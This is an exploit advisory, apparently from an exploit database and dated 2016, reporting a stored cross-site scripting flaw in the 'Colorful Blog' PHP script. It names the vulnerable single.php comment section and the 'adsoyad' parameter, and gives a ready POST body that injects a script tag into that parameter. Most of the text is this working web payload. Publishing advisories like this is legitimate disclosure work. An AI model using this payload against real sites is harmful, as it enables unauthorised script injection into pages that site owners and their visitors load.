Colorful Blog suffers from a persistent cross site scripting vulnerability.
4089f29aef88d38dcf421597427d4775437dca96743c0b464ff9d00a016e93d4
# Exploit Title : ----------- : Colorful Blog - Stored Cross Site Scripting
# Author : ----------------- : Besim
# Google Dork : --------- : -
# Date : -------------------- : 13/10/2016
# Type : -------------------- : webapps
# Platform : --------------- : PHP
# Vendor Homepage :-- : -
# Software link : --------- : https://wmscripti.com/php-scriptler/colorful-blog-scripti.html
Description :
# Vulnerable link : https://site_name/path/single.php?kat=kat&url='post_name'
*-*-*-*-*-*-*-*-* Stored XSS Payload *-*-*-*-*-*-*-*-*
*-* Vulnerable URL : https://site_name/path/single.php?kat=kat&url='post_name' --- Post comment section
*-* Vuln. Parameter : adsoyad
*-* POST DATA : adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post